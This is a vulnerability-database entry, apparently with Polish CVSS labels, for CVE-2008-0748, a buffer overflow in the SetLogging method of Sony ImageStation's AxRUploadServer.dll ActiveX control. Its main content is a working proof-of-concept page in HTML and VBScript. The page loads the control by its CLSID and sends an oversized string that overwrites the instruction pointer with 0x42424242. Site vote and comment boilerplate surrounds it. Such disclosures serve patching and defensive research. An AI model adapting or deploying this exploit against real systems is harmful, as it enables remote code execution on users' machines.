Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)

2008.02.13

Credit: david130490

Risk: High

Local: Yes

Remote: Yes

CVE: CVE-2008-0748

CWE: CWE-119

Ogólna skala CVSS: 10/10

Znaczenie: 10/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Pełny

Wpływ na integralność: Pełny

Wpływ na dostępność: Pełny

Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
--------------
Access Violation at 0x42424242
The code:
<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">
<script language='vbscript'>
Sub Son
arg1=String(5922, "A")
arg2=String(5, "B")
bof.SetLogging arg1 + arg2
End Sub
</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.